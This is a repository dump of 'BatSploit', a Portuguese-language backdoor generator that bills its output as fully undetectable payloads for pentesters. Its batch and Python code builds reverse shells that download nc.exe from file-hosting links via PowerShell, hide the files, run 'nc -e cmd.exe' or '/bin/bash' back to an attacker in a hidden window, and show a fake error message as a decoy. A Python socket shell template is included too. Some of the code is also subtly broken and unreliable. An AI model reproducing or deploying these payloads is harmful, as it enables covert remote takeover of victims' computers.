├── BatSploit_1.0 ├── BatSploit.bat ├── BatSploit.py ├── exploits │ ├── default_fud_backdoor.txt │ └── test.txt └── output │ └── null ├── README.md ├── batsploit.py ├── core.py ├── handler.py ├── nc.exe └── setup.py /BatSploit_1.0/BatSploit.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | goto in 3 | :in 4 | mode 79,20 5 | color b0 6 | cls 7 | echo. 8 | echo XXXXXXXXXXXXXXXXXXXXXXXXX 9 | echo Bem-vindo(a) ao BatSploit 10 | echo XXXXXXXXXXXXXXXXXXXXXXXXX 11 | echo coder : ProXy 12 | echo. 13 | echo [bd_bat] Backdoor using NetCat no instalation required 14 | echo [mt_handler] Handler to listen connection, instalation required NetCat 15 | echo. 16 | set /p opt=batSploit : 17 | if '%opt%'== 'bd_bat' goto bd 18 | if '%opt%'== 'mt_handler' goto hd 19 | goto e1 20 | :e1 21 | echo. 22 | echo This option doesnt exists pls select other 23 | ping localhost -n 3 > null 24 | attrib +s +h null 25 | goto in 26 | :bd 27 | set /p name=batSploit [1] FileName : 28 | echo. 29 | echo Generating Backdoor Wait One Moment 30 | echo. 31 | cd exploits 32 | msg * ALTERRE YOUR_IP E YOUR_PORT 33 | start default_fud_backdoor.txt 34 | pause 35 | copy default_fud_backdoor.txt %name%.bat 36 | move %name%.bat ../output/%name%.bat 37 | copy test.txt default_fud_backdoor.txt 38 | echo. 39 | echo Backdoor was created 40 | cd .. 41 | ping localhost -n 5 > null 42 | goto in 43 | :hd 44 | echo. 45 | set /p per=Voce tem NetCat baixado [S/N] ? 46 | if '%per%'=='N' goto n 47 | if '%per%'=='S' goto s 48 | goto e2 49 | e2: 50 | echo. 51 | echo This command doesnt exists 52 | goto 2 53 | :n 54 | echo. 55 | echo Downloading netcat ... 56 | powershell (New-Object System.Net.WebClient).DownloadFile('http://download1979.mediafire.com/ytti8lezd61g/plfm7t2nar12hdb/nc.exe', 'nc.exe') 57 | echo. 58 | echo Downloading Completed 59 | echo. 60 | set /p port=batSploit [2] Port : 61 | echo Handller Started 62 | start nc -nvlp %port% 63 | :s 64 | echo. 65 | set /p port=batSploit [2] Port : 66 | echo Handller Started 67 | start nc -nvlp %port% 68 | -------------------------------------------------------------------------------- /BatSploit_1.0/BatSploit.py: -------------------------------------------------------------------------------- 1 | #Author : Daniel Victor Freire Feitosa 2 | #Version : 1.1.0 3 | #!/usr/bin/python 4 | import os 5 | 6 | def banner(): 7 | os.system("cls") # if windows 8 | #os.system("ls") # if linux 9 | print "" 10 | print " /$$$$$$$ /$$ /$$$$$$ /$$ /$$ /$$" 11 | print " | $$__ $$ | $$ /$$__ $$ | $$ |__/ | $$" 12 | print " | $$ \ $$ /$$$$$$ /$$$$$$ | $$ \__/ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$" 13 | print " | $$$$$$$ |____ $$|_ $$_/ | $$$$$$ /$$__ $$| $$ /$$__ $$| $$|_ $$_/" 14 | print " | $$__ $$ /$$$$$$$ | $$ \____ $$| $$ \ $$| $$| $$ \ $$| $$ | $$ " 15 | print " | $$ \ $$ /$$__ $$ | $$ /$$ /$$ \ $$| $$ | $$| $$| $$ | $$| $$ | $$ /$$" 16 | print " | $$$$$$$/| $$$$$$$ | $$$$/| $$$$$$/| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/" 17 | print " |_______/ \_______/ \___/ \______/ | $$____/ |__/ \______/ |__/ \___/ " 18 | print " | $$ " 19 | print " | $$ " 20 | print " |__/ " 21 | print "" 22 | print " CODER : Daniel Victor Freire Feitosa | @DanielFreire00 | ProXySec " 23 | print "" 24 | print "Payloads List\r\n" 25 | print "===============================================================================" 26 | print "NetCat Windows Reverse Shell : windows/bd_netcat/reverse_shell\r\n" 27 | print "NetCat Linux Reverse Shell : linux/bd_netcat/reverse_shell\r\n" 28 | print "Python Reverse Shell : python/reverse_shell\r\n" 29 | print "" 30 | print "" 31 | 32 | def backdoor_netcat_windows(nc, host, port, name): 33 | bd = "color 7f && mode 20, 10\r\n" 34 | bd += "cd %TEMP%\r\n" 35 | bd += "echo powershell(new-object system.net.webclient).downloadfile('"+nc+"', 'nc.exe') >> bd.bat\r\n" 36 | bd += "echo attrib +s +h nc.exe >> bd.bat\r\n" 37 | bd += "echo nc " + host + " " + port + " -e cmd >> bd.bat\r\n" 38 | bd += "attrib +s +h bd.bat\r\n" 39 | bd += "powershell -W hidden ./bd.bat" 40 | arquivo = open(name + ".bat", "w") 41 | arquivo.write(bd) 42 | 43 | def backdoor_netcat_linux(host, port, name): 44 | bd = "echo nc "+host+" "+port+" -e /bin/bash > bd.sh" 45 | bd += "sh bd.sh & dismown && clear &> dev/null" 46 | bd += "clear" 47 | arquivo = open(name + ".sh", "w") 48 | arquivo.write(bd) 49 | 50 | def backdoor_python(host, port, name): 51 | bd = "import socket, os\r" 52 | bd += "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r" 53 | bd += "s.connect(('"+host+"', "+port+"))\r" 54 | bd += "QD=True\r" 55 | bd += "while not QD:\r" 56 | bd += " data = s.recv(1024)\r" 57 | bd += " if len(data)==0:\r" 58 | bd += " QD=True\r" 59 | bd += " a,b,c,=os.popen3(data)\r" 60 | bd += " b_value=b.read()+c.read()\r" 61 | bd += " s.send(b_value)" 62 | arquivo = open(name + ".py", "w") 63 | arquivo.write(bd) 64 | 65 | 66 | def run(): 67 | banner() 68 | cmd = raw_input("BatSploit Console _> ") 69 | if cmd == "payload windows/bd_netcat/reverse_shell": 70 | print "" 71 | print "NetCat Windows Reverse Shell" 72 | print "" 73 | nc_link = raw_input("NetCat Link Download _> ") 74 | if nc_link == "default": 75 | nc = "https://fs08n2.sendspace.com/dl/9140e71679f37b4c756ca6fcab9ff626/596eb3224bcb6aa7/3ajt22/nc.exe" 76 | #nc = "http://192.168.0.101/nc.exe" 77 | else: 78 | nc = nc_link 79 | host = raw_input("LHOST _> ") 80 | port = raw_input("LPORT _> ") 81 | name = raw_input("Name of backdoor _> ") 82 | try: 83 | print "" 84 | print "Criando Backdoor" 85 | backdoor_netcat_windows(nc, host, port, name) 86 | print "Backdoor Criada : " + name + ".bat" 87 | except: 88 | print "Algo deu errado..." 89 | elif cmd == "payload linux/bd_netcat/reverse_shell": 90 | print "" 91 | print "NetCat Linux Reverse Shell" 92 | print "" 93 | host = raw_input("LHOST _> ") 94 | port = raw_input("LPORT _> ") 95 | name = raw_input("Name of backdoor _> ") 96 | try: 97 | print "" 98 | print "Criando Backdoor" 99 | backdoor_netcat_linux(nc, host, port, name) 100 | print "Backdoor Criada : " + name + ".sh" 101 | 102 | except: 103 | print "Algo deu errado..." 104 | elif cmd == "payload python/reverse_shell": 105 | print "" 106 | print "Python Reverse Shell" 107 | print "" 108 | host = raw_input("LHOST _> ") 109 | port = raw_input("LPORT _> ") 110 | name = raw_input("Name of backdoor _> ") 111 | try: 112 | print "" 113 | print "Criando Backdoor" 114 | backdoor_python(host, port, name) 115 | print "Backdoor Criada : " + name + ".py" 116 | except: 117 | print "Algo deu errado..." 118 | 119 | run() 120 | -------------------------------------------------------------------------------- /BatSploit_1.0/exploits/default_fud_backdoor.txt: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo powershell (New-Object System.Net.WebClient).DownloadFile('http://download1979.mediafire.com/ytti8lezd61g/plfm7t2nar12hdb/nc.exe', 'nc.exe') > myCode.bat 3 | echo attrib +s +h nc.exe >> myCode.bat 4 | echo nc YOUR_IP YOUR_PORT -e cmd.exe >> myCode.bat 5 | attrib +s +h myCode.bat 6 | msg * Error 0xF85961846632 7 | powershell -WindowStyle Hidden ./myCode.bat 8 | -------------------------------------------------------------------------------- /BatSploit_1.0/exploits/test.txt: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo powershell (New-Object System.Net.WebClient).DownloadFile('http://download1979.mediafire.com/ytti8lezd61g/plfm7t2nar12hdb/nc.exe', 'nc.exe') > myCode.bat 3 | echo attrib +s +h nc.exe >> myCode.bat 4 | echo nc YOUR_IP YOUR_PORT -e cmd.exe >> myCode.bat 5 | attrib +s +h myCode.bat 6 | msg * Error 0xF85961846632 7 | powershell -WindowStyle Hidden ./myCode.bat 8 | -------------------------------------------------------------------------------- /BatSploit_1.0/output/null: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BatSploit 2 |
3 |

Projeto open-source para pentesters, contém generator de payloads FUD (Full Undetectable) e handler de escuta

4 | 5 | # Instalação 6 |

user@user:~# python setup.py

7 | 8 | # Informações Adcicionais 9 |